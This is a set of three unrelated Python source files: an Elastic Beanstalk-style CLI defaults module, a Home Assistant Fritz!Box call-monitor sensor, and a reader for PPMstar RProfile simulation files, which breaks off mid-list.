cls._validate_string(name, ParameterName.ServiceEndpoint)
class DefaultParameterValue(object):
@classmethod
def fill_default(cls, parameter_pool):
cls.fill_version_name(parameter_pool)
cls.fill_option_setting_file_name(parameter_pool)
cls.fill_connection_timeout(parameter_pool)
cls.fill_wait_timeout(parameter_pool)
cls.fill_update_timeout(parameter_pool)
cls.fill_poll_delay(parameter_pool)
@classmethod
def fill_version_name(cls, parameter_pool):
parameter_pool.put(Parameter(ParameterName.ApplicationVersionName,
ServiceDefault.DEFAULT_VERSION_NAME,
ParameterSource.Default
))
@classmethod
def fill_option_setting_file_name(cls, parameter_pool):
path = os.path.join(EbLocalDir.Path, OptionSettingFile.Name)
parameter_pool.put(Parameter(ParameterName.OptionSettingFile,
path,
ParameterSource.Default
))
@classmethod
def fill_connection_timeout(cls, parameter_pool):
parameter_pool.put(Parameter(ParameterName.ServiceConnectionTimeout,
ServiceDefault.CONNECTION_TIMEOUT_IN_SEC,
ParameterSource.Default
))
@classmethod
def fill_wait_timeout(cls, parameter_pool):
parameter_pool.put(Parameter(ParameterName.WaitForFinishTimeout,
ServiceDefault.WAIT_TIMEOUT_IN_SEC,
ParameterSource.Default
))
@classmethod
def fill_update_timeout(cls, parameter_pool):
parameter_pool.put(Parameter(ParameterName.WaitForUpdateTimeout,
ServiceDefault.UPDATE_TIMEOUT_IN_SEC,
ParameterSource.Default
))
@classmethod
def fill_poll_delay(cls, parameter_pool):
parameter_pool.put(Parameter(ParameterName.PollDelay,
ServiceDefault.POLL_DELAY_IN_SEC,
ParameterSource.Default
))
|
|
"""
A sensor to monitor incoming and outgoing phone calls on a Fritz!Box router.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.fritzbox_callmonitor/
"""
import logging
import socket
import threading
import datetime
import time
import re
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (CONF_HOST, CONF_PORT, CONF_NAME,
CONF_PASSWORD, CONF_USERNAME,
EVENT_HOMEASSISTANT_STOP)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
from homeassistant.util import Throttle
REQUIREMENTS = ['fritzconnection==0.6.5']
_LOGGER = logging.getLogger(__name__)
CONF_PHONEBOOK = 'phonebook'
CONF_PREFIXES = 'prefixes'
DEFAULT_HOST = '169.254.1.1' # IP valid for all Fritz!Box routers
DEFAULT_NAME = 'Phone'
DEFAULT_PORT = 1012
INTERVAL_RECONNECT = 60
VALUE_CALL = 'dialing'
VALUE_CONNECT = 'talking'
VALUE_DEFAULT = 'idle'
VALUE_DISCONNECT = 'idle'
VALUE_RING = 'ringing'
# Return cached results if phonebook was downloaded less then this time ago.
MIN_TIME_PHONEBOOK_UPDATE = datetime.timedelta(hours=6)
SCAN_INTERVAL = datetime.timedelta(hours=3)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_PASSWORD, default='admin'): cv.string,
vol.Optional(CONF_USERNAME, default=''): cv.string,
vol.Optional(CONF_PHONEBOOK, default=0): cv.positive_int,
vol.Optional(CONF_PREFIXES, default=[]):
vol.All(cv.ensure_list, [cv.string])
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up Fritz!Box call monitor sensor platform."""
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
phonebook_id = config.get('phonebook')
prefixes = config.get('prefixes')
try:
phonebook = FritzBoxPhonebook(
host=host, port=port, username=username, password=password,
phonebook_id=phonebook_id, prefixes=prefixes)
except: # noqa: E722 pylint: disable=bare-except
phonebook = None
_LOGGER.warning("Phonebook with ID %s not found on Fritz!Box",
phonebook_id)
sensor = FritzBoxCallSensor(name=name, phonebook=phonebook)
add_entities([sensor])
monitor = FritzBoxCallMonitor(host=host, port=port, sensor=sensor)
monitor.connect()
def _stop_listener(_event):
monitor.stopped.set()
hass.bus.listen_once(
EVENT_HOMEASSISTANT_STOP,
_stop_listener
)
return monitor.sock is not None
class FritzBoxCallSensor(Entity):
"""Implementation of a Fritz!Box call monitor."""
def __init__(self, name, phonebook):
"""Initialize the sensor."""
self._state = VALUE_DEFAULT
self._attributes = {}
self._name = name
self.phonebook = phonebook
def set_state(self, state):
"""Set the state."""
self._state = state
def set_attributes(self, attributes):
"""Set the state attributes."""
self._attributes = attributes
@property
def should_poll(self):
"""Only poll to update phonebook, if defined."""
return self.phonebook is not None
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self._attributes
def number_to_name(self, number):
"""Return a name for a given phone number."""
if self.phonebook is None:
return 'unknown'
return self.phonebook.get_name(number)
def update(self):
"""Update the phonebook if it is defined."""
if self.phonebook is not None:
self.phonebook.update_phonebook()
class FritzBoxCallMonitor:
"""Event listener to monitor calls on the Fritz!Box."""
def __init__(self, host, port, sensor):
"""Initialize Fritz!Box monitor instance."""
self.host = host
self.port = port
self.sock = None
self._sensor = sensor
self.stopped = threading.Event()
def connect(self):
"""Connect to the Fritz!Box."""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(10)
try:
self.sock.connect((self.host, self.port))
threading.Thread(target=self._listen).start()
except socket.error as err:
self.sock = None
_LOGGER.error("Cannot connect to %s on port %s: %s",
self.host, self.port, err)
def _listen(self):
"""Listen to incoming or outgoing calls."""
while not self.stopped.isSet():
try:
response = self.sock.recv(2048)
except socket.timeout:
# if no response after 10 seconds, just recv again
continue
response = str(response, "utf-8")
if not response:
# if the response is empty, the connection has been lost.
# try to reconnect
self.sock = None
while self.sock is None:
self.connect()
time.sleep(INTERVAL_RECONNECT)
else:
line = response.split("\n", 1)[0]
self._parse(line)
time.sleep(1)
def _parse(self, line):
"""Parse the call information and set the sensor states."""
line = line.split(";")
df_in = "%d.%m.%y %H:%M:%S"
df_out = "%Y-%m-%dT%H:%M:%S"
isotime = datetime.datetime.strptime(line[0], df_in).strftime(df_out)
if line[1] == "RING":
self._sensor.set_state(VALUE_RING)
att = {"type": "incoming",
"from": line[3],
"to": line[4],
"device": line[5],
"initiated": isotime}
att["from_name"] = self._sensor.number_to_name(att["from"])
self._sensor.set_attributes(att)
elif line[1] == "CALL":
self._sensor.set_state(VALUE_CALL)
att = {"type": "outgoing",
"from": line[4],
"to": line[5],
"device": line[6],
"initiated": isotime}
att["to_name"] = self._sensor.number_to_name(att["to"])
self._sensor.set_attributes(att)
elif line[1] == "CONNECT":
self._sensor.set_state(VALUE_CONNECT)
att = {"with": line[4], "device": line[3], "accepted": isotime}
att["with_name"] = self._sensor.number_to_name(att["with"])
self._sensor.set_attributes(att)
elif line[1] == "DISCONNECT":
self._sensor.set_state(VALUE_DISCONNECT)
att = {"duration": line[3], "closed": isotime}
self._sensor.set_attributes(att)
self._sensor.schedule_update_ha_state()
class FritzBoxPhonebook:
"""This connects to a FritzBox router and downloads its phone book."""
def __init__(self, host, port, username, password,
phonebook_id=0, prefixes=None):
"""Initialize the class."""
self.host = host
self.username = username
self.password = password
self.port = port
self.phonebook_id = phonebook_id
self.phonebook_dict = None
self.number_dict = None
self.prefixes = prefixes or []
# pylint: disable=import-error
import fritzconnection as fc
# Establish a connection to the FRITZ!Box.
self.fph = fc.FritzPhonebook(
address=self.host, user=self.username, password=self.password)
if self.phonebook_id not in self.fph.list_phonebooks:
raise ValueError("Phonebook with this ID not found.")
self.update_phonebook()
@Throttle(MIN_TIME_PHONEBOOK_UPDATE)
def update_phonebook(self):
"""Update the phone book dictionary."""
self.phonebook_dict = self.fph.get_all_names(self.phonebook_id)
self.number_dict = {re.sub(r'[^\d\+]', '', nr): name
for name, nrs in self.phonebook_dict.items()
for nr in nrs}
_LOGGER.info("Fritz!Box phone book successfully updated")
def get_name(self, number):
"""Return a name for a given phone number."""
number = re.sub(r'[^\d\+]', '', str(number))
if self.number_dict is None:
return 'unknown'
try:
return self.number_dict[number]
except KeyError:
pass
if self.prefixes:
for prefix in self.prefixes:
try:
return self.number_dict[prefix + number]
except KeyError:
pass
try:
return self.number_dict[prefix + number.lstrip('0')]
except KeyError:
pass
return 'unknown'
|
|
# -*- coding: utf-8 -*-
"""
This module provides a simple interface into RProfile-01-????.bobaaa files
generated by the PPMstar code
"""
from __future__ import division
from __future__ import print_function
from builtins import str
from builtins import range
from past.utils import old_div
from builtins import object
import struct
import logging
import os
import re
import sys
try:
import numpy as np
except ImportError:
print("numpy is required for reading rprofiles")
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger('rp_info')
log.setLevel(logging.DEBUG)
center_types = [(k, 'f8') for k in ('phi', 'theta', 'x', 'y', 'z')]
normal_types = [(k, 'f8') for k in ('x', 'y', 'z')]
class rprofile_set(object):
def __init__(self, source, **kwargs):
"""Load a set of RProfiles. Can pass a `path` to a set of files, or a list of `files`. Passing
the `lazy=True` makes everything operate only from disk, without loading things into memory
(for large datasets).
`source` is the path to a directory containing profiles or a list of RProfile files to open
`stride` the iteration increment. Every `stride` element is looked at during iteration. Default is 1.
`first_dump` the first dump to iterate from or None
`last_dump` the last dump to iterate through (inclusive)
There is no `.get` method... you must iterate through the files like this:
.. code-block:: python
:linenos:
rp_set = lcse.rprofile_set(path=targetpath, lazy=True, logging=True)
for rp in rp_set:
rp.get("fv_hi")
rp.get_table("fv")
"""
self.path = source
self.files = source if isinstance(source, list) else []
self.lazy = kwargs.get('lazy', True)
self.stride = kwargs.get('stride', 1)
self.first_dump = kwargs.get('first_dump')
self.last_dump = kwargs.get('last_dump')
self._logging = kwargs.get('logging')
self.log = log if self._logging else None
self.ray_profiles = {}
self._current_ix = 0
self._current = None
if self.path:
self.files = self.get_file_list_for_path(self.path) if os.path.isdir(self.path) else [self.path]
dump_re = re.compile('(.*)-([\d]{4})\.bobaaa')
self.dump_map = dict((int(dump_re.match(f).groups()[1]), f) for f in self.files if dump_re.match(f))
self.file_map = dict((f, int(dump_re.match(f).groups()[1])) for f in self.files if dump_re.match(f))
self.dumps = list(self.dump_map.keys())
self.dumps.sort()
def __iter__(self):
self._current_ix = self.dumps.index(self.first_dump) if self.first_dump else 0
return self
# Python 3 bullshit
def __next__(self):
return next(self)
def __next__(self):
if self._current_ix < len(self.dumps):
dump = self.dumps[self._current_ix]
if self.last_dump and dump > self.last_dump:
raise StopIteration()
rp = self.ray_profiles.get(dump, rprofile(self.dump_map[dump], lazy=self.lazy, logging=self._logging))
if not self.lazy and (dump not in self.ray_profiles):
self.ray_profiles[dump] = rp
self._current = rp
self._current_ix += self.stride
return rp
else:
raise StopIteration()
# def reset(self):
#
# if first_dump:
# self.start = self.dumps.index(first_dump)
#
# self._current_ix = self.start
# self._current = None
def get_dump(self, dump=None):
""" Get a new `rprofile` instance for `dump`. These are NOT cached internally."""
if self.dumps and dump is None:
dump = self.dumps[-1]
elif dump not in self.dump_map:
return None
return self.ray_profiles.get(dump, rprofile(self.dump_map[dump], lazy=self.lazy, logging=self._logging))
def get_file_list_for_path(self, path):
""" Return a list of RProfiles at the given path"""
filenames = [os.path.join(path, f) for f in os.listdir(path) if f.startswith('RProfile') and f.endswith('.bobaaa')]
filenames.sort()
return filenames
# def load_files(self, filenames):
# """ Loads `filenames` """
#
# # This should add to the existing
#
# self.files = filenames
# self.files.sort()
# self.ray_profiles = [rprofile(f, lazy=self.lazy, logging=self._logging) for f in self.files]
def check_for_new(self, path=None):
"""Check path for new files"""
current_files = self.get_file_list_for_path(self.path or path)
new_files = [f for f in current_files if f not in self.files]
self.files.extend(new_files)
self.files.sort()
return len(new_files) > 0
class rprofile(object):
"""
`rprofile.header_attrs` is a dictionary of header attributes
"""
header_var_list = [
dict(name='version', pos=0, type='i'),
dict(name='cell_ct_low', pos=1, type='i'),
dict(name='nbuckets', pos=2, type='i'),
dict(name='dump', pos=3, type='i'),
dict(name='sizeof_float', pos=4, type='i'),
dict(name='has_centers', pos=5, type='i'),
dict(name='has_corners', pos=6, type='i'),
dict(name='has_normals', pos=7, type='i'),
dict(name='isrestart', pos=8, type='i', min_ver=12),
dict(name='var_ct_low', pos=9, type='i'),
dict(name='var_ct_high', pos=10, type='i'),
dict(name='cell_ct_high', pos=11, type='i'),
dict(name='ncpucores', pos=12, type='i'),
dict(name='ntxbricks', pos=13, type='i'),
dict(name='ntybricks', pos=14, type='i'),
dict(name='ntzbricks', pos=15, type='i'),
dict(name='nxteams', pos=16, type='i'),
dict(name='nyteams', pos=17, type='i'),
dict(name='nzteams', pos=18, type='i'),
dict(name='nx', pos=19, type='i'),
dict(name='ny', pos=20, type='i'),
dict(name='nz', pos=21, type='i'),
dict(name='nsugar', pos=22, type='i'),
dict(name='nbdy', pos=23, type='i'),
dict(name='nfluids', pos=24, type='i'),
dict(name='nvars', pos=25, type='i'),
dict(name='nhalfwaves', pos=26, type='i'),
dict(name='maxrad', pos=27, type='i'),
dict(name='nteamsinbunch', pos=28, type='i'),
dict(name='ndumps', pos=29, type='i'),
dict(name='ndumpstodo', pos=30, type='i'),
dict(name='nrminrad', pos=31, type='i'),
dict(name='nrmaxrad', pos=32, type='i'),
dict(name='iburn', pos=33, type='i', min_ver=12),
dict(name='imuffledbdry', pos=34, type='i', min_ver=12),
dict(name='ireflectbdry', pos=35, type='i', min_ver=12),
# fheader (the offsets are in the fheader)
dict(name='radin0', pos=0, type='f', help='Gravity completely off inside this radius'),
dict(name='radinner', pos=1, type='f', help='Gravity starts turning off inside this radius'),
dict(name='radbase', pos=2, type='f', help='Bot convect zone'),
dict(name='radtop', pos=3, type='f', help='Top convect zone'),
dict(name='radouter', pos=4, type='f', help='Grav starts turning off outside this radius'),
dict(name='radout0', pos=5, type='f', help='Gravity completely off outside this radius'),
dict(name='radmax', pos=6, type='f', help='distance from center of grid to nearest edge'),
dict(name='dlayerbot', pos=7, type='f', help='thickness of flame zone'),
dict(name='dlayertop', pos=8, type='f', help='thickness of transition @ top of convect zone'),
dict(name='totallum', pos=9, type='f'),
dict(name='grav00base', pos=10, type='f'),
dict(name='rho00base', pos=11, type='f'),
dict(name='prs00base', pos=12, type='f'),
dict(name='gammaconv', pos=13, type='f'),
dict(name='gammabelow', pos=14, type='f'),
dict(name='gammaabove', pos=15, type='f'),
dict(name='gravconst', pos=16, type='f'),
dict(name='rhoconv', pos=17, type='f'),
dict(name='rhoabove', pos=18, type='f'),
dict(name='airmu', pos=19, type='f', min_ver=13),
dict(name='cldmu', pos=20, type='f', min_ver=13),
dict(name='fkair', pos=21, type='f', min_ver=13),
dict(name='fkcld', pos=22, type='f', min_ver=13),
dict(name='atomicnoair', pos=23, type='f', min_ver=13),
dict(name='atomicnocld', pos=24, type='f', min_ver=13),
# Global T-history
dict(name='time', pos=31+0, type='f'),
dict(name='timerescaled', pos=31+1, type='f'),
dict(name='bubbleheight', pos=31+2, type='f'),
dict(name='spikeheight', pos=31+3, type='f'),
dict(name='cycl', pos=31+4, type='f', min_ver=12),
dict(name='dt', pos=31+5, type='f'),
dict(name='courmx', pos=31+6, type='f'),
dict(name='urbubmx', pos=31+7, type='f'),
dict(name='urspkmn', pos=31+8, type='f'),
dict(name='ekmx', pos=31+9, type='f'),
dict(name='ekrmx', pos=31+10, type='f'),
dict(name='ektmx', pos=31+11, type='f'),
dict(name='ekurmn', pos=31+12, type='f'),
dict(name='ekurmx', pos=31+13, type='f'),
dict(name='eiurmn', pos=31+14, type='f'),
dict(name='eiurmx', pos=31+15, type='f'),
dict(name='Hurmn', pos=31+16, type='f'),
dict(name='Hurmx', pos=31+17, type='f'),
dict(name='ekurspkmn', pos=31+18, type='f'),
dict(name='ekurbubmx', pos=31+19, type='f'),
dict(name='eiurspkmn', pos=31+20, type='f'),
dict(name='eiurbubmx', pos=31+21, type='f'),
dict(name='Hurspkmn', pos=31+22, type='f'),
dict(name='Hurbubmx', pos=31+23, type='f'),
dict(name='ekbubmx', pos=31+24, type='f'),
dict(name='ekrbubmx', pos=31+25, type='f'),
dict(name='ektbubmx', pos=31+26, type='f'),
dict(name='ekspkmx', pos=31+27, type='f'),
dict(name='ekrspkmx', pos=31+28, type='f'),
dict(name='ektspkmx', pos=31+29, type='f'),
# Args images
dict(name='ai_vort', pos=64+0, type='f', len=2),
dict(name='ai_divu', pos=64+2, type='f', len=2),
dict(name='ai_s', pos=64+4, type='f', len=2),
dict(name='ai_fv', pos=64+6, type='f', len=2),
dict(name='ai_rho', pos=64+8, type='f', len=2),
dict(name='ai_p', pos=64+10, type='f', len=2),
dict(name='ai_ux', pos=64+12, type='f', len=2),
dict(name='ai_uy', pos=64+14, type='f', len=2),
dict(name='ai_uz', pos=64+16, type='f', len=2),
]
def __init__(self, filename, lazy=True, **kwargs):
"""Create a ray profile reader object.
`lazy` means only the header is loaded on open
"""
logging = kwargs.get('logging')
self._filename = filename
self.lazy = lazy
self.version = None
self.bucket_count = 0
self._centers = None
self._corners = None
self._normals = None
self._cache = {}
self._variable_map = {}
self._names = []
self._data = []
self.header_attrs = {}
if logging:
import logging
logging.basicConfig(level=logging.DEBUG)
self.log = logging.getLogger('rp_info')
self.log.setLevel(logging.DEBUG)
else:
self.log = None
if str(filename).isdigit():
filename = 'RProfile-01-%04i.bobaaa' % int(filename)
if self.log: self.log.info("Opening %s" % filename)
f = open(filename, 'rb')
header = f.read(128)
'''
if header[:8] != 'LCSE:RPS':
if self.log: self.log.warn('File %s is not a new Ray Profile, try an older rp_info.py' % filename)
f.close()
raise Exception('Unsupported file version')
'''
self.version = struct.unpack("i", header[8:12])[0]
f.seek(0)
if self.version < 8:
raise Exception('Unsupported version %i' % self.version)
elif self.version == 8:
self._header_size = 128
hlen = 8
self.header_var_list = self.header_var_list[:8]
# header = struct.unpack(hlen * "i", header[8:8+4*hlen])
# self.header_attrs['version'] = header[0]
# self.header_attrs['cell_ct_low'] = header[1]
# self.header_attrs['nbuckets'] = header[2]
# self.header_attrs['dump'] = header[3]
# self.header_attrs['sizeof_float'] = header[4]
# self.header_attrs['has_centers'] = header[5]
# self.header_attrs['has_corners'] = header[6]
# self.header_attrs['has_normals'] = header[7]
elif self.version > 8:
self._header_size = 1024
hlen = 127
header = f.read(self._header_size)
# Bug fixes
# Using the header info from v9
# if self.version < 11:
# self._init_v9()
# self._init_legacy()
# raw_header = struct.unpack(hlen * "i", header[8:8+4*hlen])
# raw_fheader = struct.unpack(hlen * "f", header[8+4*hlen:8+8*hlen])
# self.header_attrs.update([(k, raw_header[i]) for i, k in enumerate(self._header_names)])
# self.header_attrs.update([(k, raw_fheader[i]) for i, k in enumerate(self._fheader_names)])
# self.header_attrs.update([(k, raw_fheader[32 + i]) for i, k in enumerate(self._fheader_names2)])
# self.header_attrs.update([(k, (raw_fheader[64 + 2*i], raw_fheader[64 + 2*i + 1] )) for i, k in enumerate(self._argsimg_names)])
#elif self.version <= 12:
hmap = dict(i=struct.unpack(hlen * "i", header[8 : 8 + 4 * hlen]),
f=struct.unpack(hlen * "f", header[8 + 4 * hlen : 8 * (1 + hlen)]))
for var in self.header_var_list:
name = var['name']
pos = var['pos']
var_type = var['type']
var_len = var.get('len', 1)
min_ver = var.get('min_ver', 0)
if self.version < min_ver:
continue
# A slight offset problem
if self.version == 11 and var_type == 'f' and pos > 30: # and pos < 64:
pos = pos + 1
attr = hmap[var_type][pos] if var_len == 1 else hmap[var_type][pos : pos + var_len]
self.header_attrs[name] = attr
# Fix header problems
if self.version == 8:
self.header_attrs['cell_ct_high'] = 2 * self.header_attrs['cell_ct_low']
self.header_attrs['var_ct_high'] = 1
self.header_attrs['var_ct_low'] = 14
if self.version == 9:
self.header_attrs['cell_ct_low'] -= 2
self.header_attrs['cell_ct_high'] -= 4
if self.version < 12:
self.header_attrs['isreflectbdry'] = 1
self.header_attrs['ismuffledbdry'] = 0
if self.version > 13:
self.header_attrs['has_corners'] = False
self.bucket_count = self.header_attrs['nbuckets']
self.dump = self.header_attrs['dump']
self.buckets = self.header_attrs['nbuckets']
if self.version > 10:
self._init_v11()
if not self.lazy:
f = open(self._filename, 'r')
self._data = f.read()
f.close()
else:
self._init_legacy()
if self.version == 8:
self._init_v8()
else:
self._init_v9()
for k in ['has_centers', 'has_corners', 'has_normals']:
self.header_attrs[k] = self.header_attrs.get(k, 0) == 1
float_type = 'f8' if self.header_attrs.get('sizeof_float') == 8 else 'f4'
self._dtypes_hi = [('j_hi', 'i4')]
self._dtypes_hi.extend([(n, float_type) for n in self._names_hi])
self._col_names_hi = ['j_hi'] + self._names_hi
self._dtypes = [('j', 'i4')]
self._dtypes.extend([(n, float_type) for n in self._names])
self._col_names = ['j'] + self._names
if self.lazy:
log.warn("Lazy Loading not supported for v %i" % self.version)
self._load(f)
f.close()
def _load(self, f):
nbuckets = self.header_attrs.get('nbuckets')
cell_ct_low = self.header_attrs.get('cell_ct_low')
cell_ct_high = self.header_attrs.get('cell_ct_high')
# Read the high resolution table
self._data_hi = np.fromfile(f, dtype=self._dtypes_hi, count=cell_ct_high*(nbuckets+1))
# Read the low resolution table
self._data_low = np.fromfile(f, dtype=self._dtypes, count=cell_ct_low*(nbuckets+1))
if self.header_attrs.get('has_centers'):
vals = 3 if self.version > 12 else 5
self._centers = np.fromfile(f, dtype=np.float64, count=5 * nbuckets).reshape((vals, -1), order='F')
if self.header_attrs.get('has_normals'):
self._normals = np.fromfile(f, dtype=np.float64, count=9*nbuckets).reshape((3, 3, -1), order='F')
if self.header_attrs.get('has_corners'):
self._corners = np.fromfile(f, dtype=np.float64, count=9*nbuckets).reshape((3, 3, -1), order='F')
def get_centers(self):
""" Get centers of the buckets as an array of x, y, z """
if self._centers is None and self.version >= 11:
self._centers = self._get_array('centers')
if self.version < 13:
centers = self._centers[2:]
self._centers = old_div(-centers, np.sqrt((centers * centers).sum(0)))
return self._centers
def get_corners(self):
""" Get corners of the buckets as an array of (xyz,side #, bucket #) """
if self._corners is None and self.version >= 11:
normals = self.get_normals()
self._corners = np.zeros((3, 3, normals.shape[2]))
self._corners[:,0,:] = np.cross(normals[:,0,:], normals[:,1,:], axis=0)
self._corners[:,1,:] = np.cross(normals[:,1,:], normals[:,2,:], axis=0)
self._corners[:,2,:] = np.cross(normals[:,2,:], normals[:,0,:], axis=0)
self._corners[:,:,:] /= np.sqrt((self._corners * self._corners).sum(0))
return self._corners
def get_normals(self):
""" Get normals of the buckets as an array of (x/y/z coordinate, side #, bucket #).
"""
if self._normals is None and self.version >= 11:
self._normals = self._get_array('normals')
normals_len = np.sqrt((self._normals * self._normals).sum(0))
normals_ix = normals_len > 0.0
self._normals[:, normals_ix] = old_div(self._normals[:, normals_ix], normals_len[normals_ix])
return self._normals
def get_cell_volumes(self):
"""
Get an array of dimension (`bucket_ct`, `cell_ct_low`) containing the volume of each
totopo shaped cell.
"""
volumes = []
ys = self.get('y')
normals = self.get_normals()
a, b, c = normals[:,0,:], normals[:,1,:], normals[:,2,:]
ang_a = np.pi - np.arccos((a * b).sum(0))
ang_b = np.pi - np.arccos((b * c).sum(0))
ang_c = np.pi - np.arccos((c * a).sum(0))
angles = np.vstack([ang_a, ang_b, ang_c])
dr = (ys[1] - ys[0])
r_sq = dr * (ys**2)
bucket_angles = angles.sum(0) - np.pi
for i in range(0, self.bucket_count):
vols = r_sq * bucket_angles[i]
volumes.append(vols.reshape((-1,1)))
return np.hstack(volumes)
def get_table(self, var):
"""Get a table of dimension (4, ncells, nbuckets+1) containg all buckets
(including the global average bucket zero). The first dimension contains the
statastical information: average, min, max, sd.
"""
if var not in self._variable_names:
print('Variable %s not found in table. Available variables are %s' % (var, self._variable_names))
return
if self.version >= 11:
return self._get_array(var)
else:
return self._get_legacy(var)
def get(self, var):
"""Get the global bucket for variable `var` or get header attribute `var`.
Use `get_table(self, var)` to get the same variable but for all buckets.
If the global bucket is returned an array of dimension (4, ncells) is returned.
The first dimension contains avg, min, max, sd.
"""
if var in self.header_attrs:
return self.header_attrs.get(var)
if self.version >= 11:
return self._get_array(var, global_only=True)
else:
return self._get_legacy(var, global_only=True)
def _get_array(self, var, global_only=False):
if var not in self._variable_map:
return None
if var in self._cache:
return self._cache[var]
offset, dtype, count, shape = self._variable_map[var]
# print self._variable_map[var], global_only
if global_only and len(shape) == 3 and shape[2] == self.bucket_count + 1:
count = shape[0] * shape[1]
shape = shape[:2]
if self.lazy:
f = open(self._filename, 'r')
f.seek(offset)
data = np.fromfile(f, dtype=dtype, count=count).reshape(shape, order='F')
f.close()
else:
data = np.frombuffer(self._data[offset:], dtype=dtype,
count=count).reshape(shape, order='F')
if not global_only:
self._cache[var] = data
return data
def _get_legacy(self, var, global_only=False):
if var in self._col_names_hi:
data_array = self._data_hi
radial = self.header_attrs.get('cell_ct_high')
elif var in self._col_names:
radial = self.header_attrs.get('cell_ct_low')
data_array = self._data_low
else:
#print var, self._col_names_hi, self._col_names, self.header_attrs
raise Exception("Attribute '%s' not found, look in .get_variables() and .get_attributes()" % var)
if var in self._legacy_remap:
remap_vars = self._legacy_remap[var]
data_out = np.zeros((len(remap_vars), radial, self.bucket_count + 1), order='F')
var_array = []
for i, v in enumerate(remap_vars):
data_out[i,:,:] = data_array[:][v].reshape((radial, -1), order='F')
data = data_out
else:
data = data_array[:][var].reshape((radial, -1), order='F')
if var in ['y', 'j', 'j_hi', 'y_hi']:
data = data[:,0]
elif global_only:
data = data[:,:,0]
# The old format was backwards
if self.version < 9:
if len(data.shape) == 3:
data = data[:,::-1,:]
elif len(data.shape) == 2:
data = data[:,::-1]
else:
data = data[::-1]
return data
def get_attributes(self):
attrs = list(self.header_attrs.keys())
attrs.sort()
return attrs
def get_variables(self):
return self._variable_names
def _init_v8(self):
self._header_names = ['version', 'nradial_low', 'nbuckets', 'dump',
'sizeof_float', 'has_centers', 'has_corners', 'has_normals']
self._names_hi = ['y_hi', 'fv_hi', 'fvmn_hi', 'fvmx_hi', 'fvsd_hi']
self._names = ['counts', 'y',
'fv', 'fvmn','fvmx','fvsd',
'rho', 'rhomn', 'rhomx', 'rhosd',
'rhourbubble', 'rhourbubblemn', 'rhourbubblemx', 'rhourbubblesd',
'rhourspike', 'rhourspikemn', 'rhourspikemx', 'rhourspikesd',
'p', 'pmn', 'pmx', 'psd',
'ux','uxmn','uxmx','uxsd',
'uy', 'uymn', 'uymx', 'uysd',
'uz', 'uzmn', 'uzmx', 'uzsd',
'ekr', 'ekrmn','ekrmx','ekrsd',
'ekt','ektmn','ektmx','ektsd',
'ek', 'ekmn','ekmx','eksd',
'ekur','ekurmn','ekurmx','ekursd',
'eiur', 'eiurmn', 'eiurmx', 'eiursd',
'hur', 'hurmn', 'hurmx', 'hursd']
self._header_arrays = ['normals', 'centers', 'corners']
def _init_v9(self):
self._init_v8()
self._names.extend(['ceul', 'ceulmn', 'ceulmx', 'ceulsd',
'mach', 'machmn', 'machmx', 'machsd',
'enuc', 'enucmn', 'enucmx', 'enucsd',
'fnuc', 'fnucmn', 'fnucmx', 'fnucsd',
'dy', 'dymn', 'dymx', 'dysd'])
def _init_legacy(self):
''' Initialize internals for old versions (< 11)'''
buckets_total = 1 + self.bucket_count
var_ct_high = self.header_attrs.get('var_ct_high')
var_ct_low = self.header_attrs.get('var_ct_low')
cell_ct_high = self.header_attrs.get('cell_ct_high')
cell_ct_low = self.header_attrs.get('cell_ct_low')
sizeof_float = self.header_attrs.get('sizeof_float')
float_type = np.float64 if sizeof_float == 8 else np.float32
self._variable_list = [('centers', float_type, sizeof_float, (5, self.bucket_count)),
('normals', float_type, sizeof_float, (3, 3, self.bucket_count)),
('corners', float_type, sizeof_float, (3, 3, self.bucket_count))]
offset = self._header_size
# Integer Arrays (j, h_hi)
offset += 4 * buckets_total * (cell_ct_high + cell_ct_low)
# Float array, yav + counts + 4 * nvars. No high counts
offset += 8 * buckets_total * ((1 + 4 * var_ct_high) * cell_ct_high + (2 + 4 * var_ct_low) * cell_ct_low)
for name, dtype, sizeof, shape in self._variable_list:
count = np.prod(shape)
size = sizeof * count
self._variable_map[name] = (offset, dtype, count, shape)
offset += size
self._variable_names = list(self._variable_map.keys())
self._variable_names.sort()
# Variable meta
self._legacy_remap = dict(fv_hi=('fv_hi', 'fvmn_hi','fvmx_hi','fvsd_hi'),
fv=('fv', 'fvmn','fvmx','fvsd'),
rho=('rho', 'rhomn', 'rhomx', 'rhosd'),
rhourbubble=('rhourbubble', 'rhourbubblemn', 'rhourbubblemx', 'rhourbubblesd'),
rhourspike=('rhourspike', 'rhourspikemn', 'rhourspikemx', 'rhourspikesd'),
p=('p', 'pmn', 'pmx', 'psd'),
ux=('ux','uxmn','uxmx','uxsd'),
uy=('uy', 'uymn', 'uymx', 'uysd'),
uz=('uz', 'uzmn', 'uzmx', 'uzsd'),
ekr=('ekr', 'ekrmn','ekrmx','ekrsd'),
ekt=('ekt','ektmn','ektmx','ektsd'),
ek=('ek', 'ekmn','ekmx','eksd'),
ekur=('ekur','ekurmn','ekurmx','ekursd'),
eiur=('eiur', 'eiurmn', 'eiurmx', 'eiursd'),
hur=('hur', 'hurmn', 'hurmx', 'hursd'),
ceul=('ceul', 'ceulmn', 'ceulmx', 'ceulsd'),
mach=('mach', 'machmn', 'machmx', 'machsd'),
enuc=('enuc', 'enucmn', 'enucmx', 'enucsd'),
fnuc=('fnuc', 'fnucmn', 'fnucmx', 'fnucsd'),
dy=('dy', 'dymn', 'dymx', 'dysd'))
self._legacy_order = ['counts', 'y', 'fv', 'rho', 'rhourbubble', 'rhourspike',
